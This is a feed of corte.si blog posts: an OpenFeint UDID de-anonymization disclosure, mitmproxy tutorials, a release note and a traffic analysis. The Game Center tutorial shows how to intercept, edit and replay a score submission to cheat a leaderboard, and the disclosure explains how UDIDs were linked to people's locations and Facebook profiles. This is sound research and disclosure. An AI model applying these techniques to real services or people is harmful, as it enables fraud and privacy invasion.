#22863A;\">profile_picture_updated_at<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">profile_picture_url<\/span><span>&gt;http:\/\/XXX&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_content_type<\/span><span style=\"color: #6F42C1;\"> nil<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;true&quot;<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;\/<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_content_type<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_file_name<\/span><span style=\"color: #6F42C1;\"> nil<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;true&quot;<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;\/<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_file_name<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_file_size<\/span><span style=\"color: #6F42C1;\"> nil<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;true&quot;<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;\/<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_file_size<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_updated_at<\/span><span style=\"color: #6F42C1;\"> nil<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;true&quot;<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;\/<\/span><span style=\"color: #22863A;\">uploaded_profile_picture_updated_at<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">name<\/span><span>&gt;XXX&lt;\/<\/span><span style=\"color: #22863A;\">name<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>  &lt;\/<\/span><span style=\"color: #22863A;\">user<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;\/<\/span><span style=\"color: #22863A;\">resources<\/span><span>&gt;<\/span><\/span><\/code><\/pre>\n<p>Included is my latitude and longitude, the last game I played, my chosen\naccount name, and my Facebook profile picture URL.<\/p>\n<h2 id=\"linking-udids-to-gps-co-ordinates\">Linking UDIDs to GPS co-ordinates<\/h2>\n<p>If the user has opted to allow OpenFeint to use their location, latitude and\nlongitude is returned in the profile results. This lets us trivially associate\na UDID with GPS co-ordinates.<\/p>\n<p><em>The location leak was fixed by OpenFeint after my report. Although some\nportions of the OpenFeint API still returns a user location, it seems that it\nis no longer served for direct profile requests.<\/em><\/p>\n<h2 id=\"linking-udids-to-facebook-profiles\">Linking UDIDs to Facebook profiles<\/h2>\n<p>If the user registered a Facebook account with OpenFeint, a profile picture URL\nhosted by the Facebook CDN was returned in the user's profile data. Facebook\nprofile picture URLs include the user's Facebook ID, directly linking it to\ntheir Facebook account.<\/p>\n<p>For example, here's Bruce Schneier's Facebook profile picture URL:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>http:\/\/profile.ak.fbcdn.net\/hprofile-ak-snc4\/41795_60615378024_8092_n.jpg<\/span><\/span><\/code><\/pre>\n<p>The 11-digit number in this URL is his Facebook user ID. We can now view his\nprofile using a URL like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>http:\/\/www.facebook.com\/profile.php?id=60615378024<\/span><\/span><\/code><\/pre>\n<p>This final step represents a complete de-anonymization of the UDID, directly\nlinking the supposedly anonymous identifier with a user's real-world identity.<\/p>\n<p><em>The Facebook ID leak was fixed by OpenFeint after my report.<\/em><\/p>\n<h2 id=\"openfeint-s-response\">OpenFeint's response<\/h2>\n<p>I reported this problem to OpenFeint on 5th of April. I did not hear back from\nthem immediately, but I knew they were working on the problem because their API\nstopped returning GPS coordinates and Facebook profile picture URLs. On the\n12th, I received an email from Jason Citron, OpenFeint's CEO, who wanted to set\nup a phone conversation with me, him and an OpenFeint legal representative.  We\nspoke on the evening of the 20th of April. I recapped my findings and expressed\nconcern that their API still linked UDIDs to user accounts. They thanked me for\nthe vulnerability report, confirmed that they had tightened their API in\nresponse to it, and asked for more time to consider the issue before I released\nanything. The following morning, it was announced that OpenFeint had been\n<a rel=\"external\" href=\"http:\/\/openfeint.com\/company\/press\/33-GREE-Puts-Over-100-Million-into-OpenFeint-to-Drive-Global-Expansion-with-100M-users\">bought by GREE for $104\nmillion<\/a>.<\/p>\n<p>Last week I received what I assume is OpenFeint's last word on the matter, in\nthe form of an email from Jason Citron: \"We will continue to pay attention to\nthe issues you raised and will continue to adjust our practices as necessary.\"\nAt the time of writing, OpenFeint's API still allows you to associate a UDID\nwith a private user information.<\/p>\n<h2 id=\"impact\">Impact<\/h2>\n<p>Testing with a small corpus of UDIDs gathered from my own and friends' devices,\nI was able to link roughly 30% of UDIDs to GPS co-ordinates, 20% of users to a\nweak identity (e.g.  OpenFeint profile picture, user-chosen account name), and\n10% of UDIDs directly to a Facebook profile. I stress that my sample was small\nand probably unrepresentative - only OpenFeint knows what the real numbers are.\nNone the less, we can make a broad guess at the magnitude of the problem, based\non the fact that OpenFeint <a rel=\"external\" href=\"http:\/\/openfeint.com\/company\/press\/33-GREE-Puts-Over-100-Million-into-OpenFeint-to-Drive-Global-Expansion-with-100M-users\">claims to have 75 million\nusers<\/a>:<\/p>\n<ul>\n<li>This would mean that about 7.5 million users may have had Facebook accounts\nlinked publicly to their UDIDs until OpenFeint stopped returning profile\npicture URLs a few weeks ago.<\/li>\n<li>About 22.5 million users may have had GPS co-ordinates linked publicly to\ntheir UDIDs until the issue was corrected.<\/li>\n<li>About 15 million users may still have identifying information like profile\npictures and user-chosen account names (that can often be used to identify\nusers) exposed.<\/li>\n<li>All 75 million users still have personal details like the last\nOpenFeint-enabled game they played and whether they are online (i.e. logged in\nto the OpenFeint network) exposed.<\/li>\n<\/ul>\n<p>Although the Facebook and GPS de-anonymization issues have been repaired, we\nhave to consider the possibility that these vulnerabilities have already been\nused to de-anonymize a database of UDIDs.<\/p>\n<h2 id=\"conclusion\">Conclusion<\/h2>\n<p>I want to stress that the problem here is not primarily with OpenFeint. By\ndesigning an API to expose UDIDs and encouraging developers to use it, Apple\nhas ensured that there are literally thousands of databases linking UDIDs to\nsensitive user information on the net. A leak from any one of these - or worse\na large-scale de-anonymization like the OpenFeint one - inevitably has serious\nconsequences for user privacy.<\/p>\n<div class=\"footnote-definition\" id=\"1\"><sup class=\"footnote-definition-label\">1<\/sup>\n<p>I should note that this is not quite accurate. The UDID is actually a\ncomputed value - a hash calculated over a set of identifying hardware\nattributes. In a sense, it only really exists as an API call.<\/p>\n<\/div>\n"},{"title":"mitmproxy: A 30-second client playback example","published":"2011-03-31T00:00:00+00:00","updated":"2011-03-31T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/tute-30-seconds\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/tute-30-seconds\/","content":"<p><a href=\"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_4\/\">Yesterday<\/a> I published version 0.4 of\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> - an intercepting proxy for HTTP\/S traffic.\nThe tool already has pretty complete documentation, but I've decided to write a\nseries of less formal tutorials to showcase its abilities. Below is the first,\nand simplest, of these - keep an eye on the blog for more in the coming days.<\/p>\n<h2 id=\"a-30-second-client-playback-example\">A 30-second client playback example<\/h2>\n<p>My local cafe is serviced by a rickety and unreliable wireless network,\ngenerously sponsored with ratepayers' money by our city council. After\nconnecting, you  are redirected to an SSL-protected page that prompts you for a\nusername and password. Once you've entered your details, you are free to enjoy\nthe intermittent dropouts, treacle-like speeds and incorrectly configured\ntransparent proxy.<\/p>\n<p>I tend to automate this kind of thing at the first opportunity, on the theory\nthat time spent now will be more than made up in the long run. In this case, I\nmight use <a rel=\"external\" href=\"http:\/\/getfirebug.com\/\">Firebug<\/a> to ferret out the form post\nparameters and target URL, then fire up an editor to write a little script\nusing Python's <a rel=\"external\" href=\"http:\/\/docs.python.org\/library\/urllib.html\">urllib<\/a> to simulate\na submission. That's a lot of futzing about. With mitmproxy we can do the job\nin literally 30 seconds, without having to worry about any of the details.\nHere's how.<\/p>\n<h3 id=\"1-run-mitmdump-to-record-our-http-conversation-to-a-file\">1. Run mitmdump to record our HTTP conversation to a file.<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;<\/span><span> mitmdump -w wireless-login<\/span><\/span><\/code><\/pre><h3 id=\"2-point-your-browser-at-the-mitmdump-instance\">2. Point your browser at the mitmdump instance.<\/h3>\n<p>I use a tiny Firefox addon called <a rel=\"external\" href=\"https:\/\/addons.mozilla.org\/en-us\/firefox\/addon\/toggle-proxy-51740\/\">Toggle\nProxy<\/a> to\nswitch quickly to and from mitmproxy. I'm assuming you've already <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/ssl.html\">configured\nyour browser with mitmproxy's SSL certificate\nauthority<\/a>.<\/p>\n<h3 id=\"3-log-in-as-usual\">3. Log in as usual.<\/h3>\n<p>And that's it! You now have a serialized version of the login process in the\nfile wireless-login, and you can replay it at any time like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;<\/span><span> mitmdump -c wireless-login<\/span><\/span><\/code><\/pre><h2 id=\"embellishments\">Embellishments<\/h2>\n<p>We're really done at this point, but there are a couple of embellishments we\ncould make if we wanted. I use <a rel=\"external\" href=\"http:\/\/wicd.sourceforge.net\/\">wicd<\/a> to\nautomatically join wireless networks I frequent, and it lets me specify a\ncommand to run after connecting. I used the client replay command above and\nvoila! - totally hands-free wireless network startup.<\/p>\n<p>We might also want to prune requests that download CSS, JS, images and so forth.\nThese add only a few moments to the time it takes to replay, but they're not\nreally needed and I somehow feel compelled trim them anyway. So, we fire up the\nmitmproxy console tool on our serialized conversation, like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">&gt;<\/span><span> mitmproxy wireless-login<\/span><\/span><\/code><\/pre>\n<p>We can now go through and manually delete (using the <strong>d<\/strong> keyboard shortcut)\neverything we want to trim. When we're done, we use <strong>S<\/strong> to save the\nconversation back to the file.<\/p>\n"},{"title":"mitmproxy: Breaking Apple's Game Center with replay","published":"2011-03-31T00:00:00+00:00","updated":"2011-03-31T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/tute-gamecenter\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/tute-gamecenter\/","content":"<p>This is the second in the series of tutorials I'm writing for\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a>. You can find the first one - a 30 second\ntutorial on client replay - <a href=\"https:\/\/corte.si\/posts\/code\/mitmproxy\/tute-30-seconds\/\">here<\/a>.\nThere will be more to come in the next few days.<\/p>\n<h2 id=\"the-setup\">The setup<\/h2>\n<p>In this tutorial, I'm going to show you how simple it is to creatively interfere\nwith Apple Game Center traffic using mitmproxy. To set things up, I registered\nmy mitmproxy CA certificate with my iPhone - there's a <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/certinstall\/ios.html\">step by step set of\ninstructions<\/a> for doing this in\nthe mitmproxy docs. I then started mitmproxy on my desktop, and configured the\niPhone to use it as a proxy.<\/p>\n<h2 id=\"taking-a-look-at-the-game-center-traffic\">Taking a look at the Game Center traffic<\/h2>\n<p>Lets take a first look at the Game Center traffic. The game I'll use in this\ntutorial is <a rel=\"external\" href=\"http:\/\/itunes.apple.com\/us\/app\/super-mega-worm\/id388541990?mt=8\">Super Mega\nWorm<\/a> - a great\nlittle retro-apocalyptic sidescroller for the iPhone:<\/p>\n<div class=\"media\">\n    <a href=\"supermega.png\">\n        <img src=\"supermega.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>After finishing a game (take your time), watch the traffic flowing through\nmitmproxy:<\/p>\n<div class=\"media\">\n    <a href=\"one.png\">\n        <img src=\"one.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>We see a bunch of things we might expect - initialisation, the retrieval of\nleaderboards and so forth. Then, right at the end, there's a POST to this\ntantalising URL:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>https:\/\/service.gc.apple.com\/WebObjects\/GKGameStatsService.woa\/wa\/submitScore<\/span><\/span><\/code><\/pre>\n<p>The contents of the submission are particularly interesting:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"xml\"><span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">plist<\/span><span style=\"color: #6F42C1;\"> version<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;1.0&quot;<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">dict<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;category&lt;\/<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">string<\/span><span>&gt;SMW_Adv_USA1&lt;\/<\/span><span style=\"color: #22863A;\">string<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;score-value&lt;\/<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;55&lt;\/<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;timestamp&lt;\/<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;1301553284461&lt;\/<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;\/<\/span><span style=\"color: #22863A;\">dict<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;\/<\/span><span style=\"color: #22863A;\">plist<\/span><span>&gt;<\/span><\/span><\/code><\/pre>\n<p>This is a <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Property_list\">property list<\/a>,\ncontaining an identifier for the game, a score (55, in this case), and a\ntimestamp. Looks pretty simple to mess with.<\/p>\n<h2 id=\"modifying-and-replaying-the-score-submission\">Modifying and replaying the score submission<\/h2>\n<p>Lets edit the score submission. First, select it in mitmproxy, then press\n<strong>enter<\/strong> to view it. Make sure you're viewing the request, not the response -\nyou can use <strong>tab<\/strong> to flick between the two. Now press <strong>e<\/strong> for edit. You'll\nbe prompted for the part of the request you want to change - press <strong>b<\/strong> for\nbody.  Your preferred editor (taken from the EDITOR environment variable) will\nnow fire up. Lets bump the score up to something a bit more ambitious:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"xml\"><span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">plist<\/span><span style=\"color: #6F42C1;\"> version<\/span><span>=<\/span><span style=\"color: #032F62;\">&quot;1.0&quot;<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;<\/span><span style=\"color: #22863A;\">dict<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;category&lt;\/<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">string<\/span><span>&gt;SMW_Adv_USA1&lt;\/<\/span><span style=\"color: #22863A;\">string<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;score-value&lt;\/<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;2200272667&lt;\/<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;timestamp&lt;\/<\/span><span style=\"color: #22863A;\">key<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;1301553284461&lt;\/<\/span><span style=\"color: #22863A;\">integer<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;\/<\/span><span style=\"color: #22863A;\">dict<\/span><span>&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;\/<\/span><span style=\"color: #22863A;\">plist<\/span><span>&gt;<\/span><\/span><\/code><\/pre>\n<p>Save the file and exit your editor.<\/p>\n<p>The final step is to replay this modified request. Simply press <strong>r<\/strong> for\nreplay.<\/p>\n<h2 id=\"the-glorious-result-and-some-intrigue\">The glorious result and some intrigue<\/h2>\n<div class=\"media\">\n    <a href=\"leaderboard.png\">\n        <img src=\"leaderboard.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>And that's it - according to the records, I am the greatest Super Mega Worm\nplayer of all time.<\/p>\n<p>Curiously, the top competitors' scores are all the same: 2,147,483,647. If you\nthink that number seems familiar, you're right: it's 2^31-1, the maximum value\nyou can fit into a signed 32-bit int. Now let me tell you another peculiar\nthing about Super Mega Worm - at the end of every game, it submits your highest\nprevious score to the Game Center, not your current score.  This means that it\nstores your highscore somewhere, and I'm guessing that it reads that stored\nscore back into a signed integer. So, if you <em>were<\/em> to cheat by the relatively\npedestrian means of modifying the saved score on your jailbroken phone, then\n2^31-1 might well be the maximum score you could get. Then again, if the game\nitself stores its score in a signed 32-bit int, you could get the same score\nthrough perfect play, effectively beating the game. So, which is it in this\ncase? I'll leave that for you to decide.<\/p>\n"},{"title":"mitmproxy 0.4 has been released","published":"2011-03-30T00:00:00+00:00","updated":"2011-03-30T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_4\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_4\/","content":"<div class=\"media\">\n    <a href=\"..&#x2F;mitmproxy_0_4.png\">\n        <img src=\"..&#x2F;mitmproxy_0_4.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>I've just tagged and released mitmproxy 0.4. You can download it from the new\nproject website:<\/p>\n<h2 id=\"mitmproxy-org\"><a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy.org<\/a><\/h2>\n<p>This is a huge update, with dozens\nof new features, and improvements to almost every aspect of the project.  A few\nhighlights are:<\/p>\n<ul>\n<li>Complete serialization of HTTP\/S conversations<\/li>\n<li>On-the-fly generation of SSL interception certificates<\/li>\n<li>Ability to replay both the client and the server side of HTTP\/S conversations<\/li>\n<li>mitmdump has grown up to be a powerful tcpdump-like commandline tool for HTTP\/S<\/li>\n<li>Scripting hooks for programmatic modification of traffic using Python<\/li>\n<li>Many, many user interface improvements, bug fixes, and minor features<\/li>\n<li>Better <a rel=\"external\" href=\"http:\/\/mitmproxy.org\/doc\/index.html\">documentation<\/a>.<\/li>\n<\/ul>\n<p>Special thanks go to <a rel=\"external\" href=\"http:\/\/www.henriknordstrom.net\/\">Henrik Nordstr\u00f6m<\/a> for\nmany great contributions to this release. I'd love more contributors to join\nthe project - if you feel like hacking on mitmproxy, take a look at the\n<a rel=\"external\" href=\"https:\/\/github.com\/cortesi\/mitmproxy\/blob\/master\/todo\">todo<\/a> file at the top\nof the tree for ideas.<\/p>\n<p>Over the next week I will write a series of tutorials to showcase mitmproxy's\nabilities, ranging from simple to quite complex. Keep an eye on the blog for\nthese - they will be published here first, before making their way into the\nofficial documentation.<\/p>\n"},{"title":"Social news eats a blog post","published":"2011-01-24T00:00:00+00:00","updated":"2011-01-24T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/socialmedia\/post-lifecycle\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/socialmedia\/post-lifecycle\/","content":"<p>This is the second post in which I try to add some data to my nagging doubts\nabout the technical news ecosystem. In my <a href=\"https:\/\/corte.si\/posts\/socialmedia\/redditgraph\/\">previous\npost<\/a>, I showed off a visualisation of\nhow the proggit front page changes over time. In this post, I take a look at the\nflip-side of the coin - what happens to a specific post as it passes through the\nshort, fickle social news cycle?  To do this, I'll take a deep dive into my own\nserver logs, looking at a <a href=\"https:\/\/corte.si\/posts\/code\/cyclesort\/\">recent post of mine<\/a>\nthat appeared briefly on both <a rel=\"external\" href=\"http:\/\/news.ycombinator.com\">Hacker News<\/a> and\n<a rel=\"external\" href=\"http:\/\/www.reddit.com\/r\/programming%22\">proggit<\/a>. I'd guess that nearly all posts\nfollow more or less the same trajectory as they are extruded through the social\nnews mill, so this should be interesting to more people than just me. At the\nrisk of making things a bit dry and descriptive, I'm saving speculation and\ninterpretation for a future post.<\/p>\n<p>The scene is set at about 10pm New Zealand time, when I put the finishing\ntouches to my blog post, and fire off an rsync up to my server. I quickly\ndouble-check that the blog and the RSS feed have updated OK, <a rel=\"external\" href=\"http:\/\/twitter.com\/cortesi\/status\/6627667512131584\">tweet a\nlink<\/a> to the post, and go to\nbed. While I sleep, the post creeps onto both Hacker News and proggit,\nultimately getting 41000 hits over the next 5 days or so. The graphs below show\nonly the first 50 hours of the post's lifetime - everything after that is just a\nlong, slow d\u00e9nouement as it dwindles into obscurity.<\/p>\n<h2 id=\"our-real-time-robot-overlords\">Our real-time robot overlords<\/h2>\n<p>The action starts almost as soon as I click the \"tweet\" button. Within seconds,\nthe post is retrieved by Twitterbot. One second later, Googlebot appears, and\nalmost simultaneously I get hit by Jaxified, Njuice, LinkedIn and PostRank. In\nall, 10 bots read my blog post within the first minute, handily beating the\nfirst human, who slouches lethargically into view at a tardy 90 seconds.<\/p>\n<p>Below is a list of the bots that retrieved my post before the first submission\nto a social news site. These are the realtime robots, presumably hoovering up\nthe Twitter firehose and indexing all the links they find. The cast of\ncharacters is a mixture of the expected big fish, stealth startups, and\nskunkworks projects at well-known companies. Bot identity was gleaned from HTTP\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/User_agent\">user-agent<\/a> headers when they were\nprovided, or by checking the ownership of the responsible IP through reverse DNS\nresolution and whois lookups when they weren't. Most of the real-time bots were\nwell behaved, identifying themselves clearly with a URL in the user-agent\nstring.<\/p>\n<style>\n    .soctable td {\n        padding-left: 0 !important;\n    }\n<\/style>\n<table class=\"soctable\">\n    <tr>\n        <th>minutes after publication<\/th>\n        <th>bot<\/th>\n    <\/tr>\n    <tr>\n        <td rowspan=\"10\">1<\/td> <td><a href=\"http:\/\/twitter.com\">Twitter<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.google.com\/bot.html\">Google<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.jaxified.com\/crawler\">Jaxified<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/njuice.com\/\">NJuice<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.linkedin.com\">LinkedIn<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.postrank.com\/\">PostRank<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>Unidentified bot from a Microsoft-owned IP<\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/help.yahoo.com\/help\/us\/ysearch\/slurp\">Yahoo! Slurp<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>Unidentified bot from a <a\n        href=\"http:\/\/www.bbc.co.uk\/blogs\/rad\/\">BBC RAD labs<\/a> IP.\n        <\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.oneriot.com\/\">OneRiot<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td rowspan=\"4\">2<\/td> <td><a href=\"http:\/\/friendfeed.com\/about\/bot\">FriendFeed<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.kosmix.com\/\">Kosmix<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/labs.topsy.com\/butterfly\/\">Topsy Butterfly<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>Unidentified bot from <a href=\"http:\/\/marban.com\">marban.com<\/a> subdomain. (PoPUrls?)<\/td>\n    <\/tr>\n    <tr>\n        <td rowspan=\"2\">3<\/td> <td><a href=\"http:\/\/metauri.com\/\">metauri.com<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/search.msn.com\/msnbot.htm\">msnbot<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td rowspan=\"2\">6<\/td> <td><a href=\"http:\/\/summify.com\">Summify<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>Bot identifying itself just as \"NING\", can't confirm that it's <a\n        href=\"http:\/\/www.ning.com\/\">the Ning<\/a>. <\/td>\n    <\/tr>\n    <tr>\n        <td>9<\/td> <td><a href=\"http:\/\/tineye.com\/crawler.html\">tineye<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>26<\/td> <td><a href=\"http:\/\/spinn3r.com\/robot\">spinn3r.com<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>27<\/td> <td><a href=\"http:\/\/www.backtype.com\/\">backtype.com<\/a><\/td>\n    <\/tr>\n    <tr>\n        <td>47<\/td> <td><a href=\"http:\/\/www.facebook.com\/externalhit_uatext.php\">facebookexternalhit<\/a><\/td>\n    <\/tr>\n<\/table>\n<h2 id=\"enter-the-heavyweights-hacker-news-and-reddit\">Enter the heavyweights: Hacker News and Reddit<\/h2>\n<p>48 minutes after the post was published, the first hit from a social news site\nappears: hello <a href=\"http:\/\/news.ycombinator.com\">Hacker News<\/a>. The post\nquickly makes it onto the front page, and HN traffic peaks at 399 hits per hour\nin the second hour after publication. All told, the post got 2337 hits with a\nHN <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/HTTP_referrer\">referrer header<\/a>.<\/p>\n<div class=\"media\">\n    <a href=\"ycombinator.png\">\n        <img src=\"ycombinator.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        news.ycombinator.com\n    <\/div>\n    \n<\/div>\n<p>Two hours and three minutes after publication, the real monster of social news\narrives: the first hit from Reddit appears. The Reddit traffic peaks in the\nsixth hour after publication at 3025 hits per hour, and delivers a total of\n23807 hits in the 51 hours after publication.<\/p>\n<div class=\"media\">\n    <a href=\"reddit.png\">\n        <img src=\"reddit.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        reddit.com\/r\/programming\n    <\/div>\n    \n<\/div><h2 id=\"the-long-tail\">The long tail<\/h2>\n<p>Reddit accounted for the vast majority of the post's traffic, dwarfing all\nother sources combined. In all, I received only 2300 hits with specified\nreferrer headers that weren't Reddit or HN. Here are all the referrers that\nwere responsible for more than 10 hits to the post:<\/p>\n<table>\n    <tr><th>hits<\/th><th>site<\/th><\/tr>\n    <tr><th>456<\/th> <td><a href=\"http:\/\/popurls.com\">popurls.com<\/a><\/td><\/tr>\n    <tr><th>359<\/th> <td><a href=\"http:\/\/www.google.com\/reader\">Google Reader<\/a><\/td><\/tr>\n    <tr><th>282<\/th> <td><a href=\"http:\/\/twitter.com\">Twitter<\/a><\/td><\/tr>\n    <tr><th>196<\/th> <td><a href=\"http:\/\/jimmyr.com\">jimmyr.com<\/a><\/td><\/tr>\n    <tr><th>183<\/th> <td><a href=\"http:\/\/delicious.com\">delicious<\/a><\/td><\/tr>\n    <tr><th>153<\/th> <td><a href=\"http:\/\/pop.is\">pop.is<\/a><\/td><\/tr>\n    <tr><th>139<\/th> <td><a href=\"http:\/\/www.google.com\">Google Search<\/a><\/td><\/tr>\n    <tr><th>82<\/th> <td><a href=\"http:\/\/www.wired.com\">wired.com<\/a><\/td><\/tr>\n    <tr><th>56<\/th> <td><a href=\"http:\/\/www.facebook.com\">Facebook<\/a><\/td><\/tr>\n    <tr><th>36<\/th> <td><a href=\"http:\/\/longurl.com\">longurl.com<\/a><\/td><\/tr>\n    <tr><th>36<\/th> <td><a href=\"http:\/\/glozer.net\/trendy\">glozer.net\/trendy<\/a><\/td><\/tr>\n    <tr><th>30<\/th> <td><a href=\"http:\/\/oursignal.com\">oursignal.com<\/a><\/td><\/tr>\n    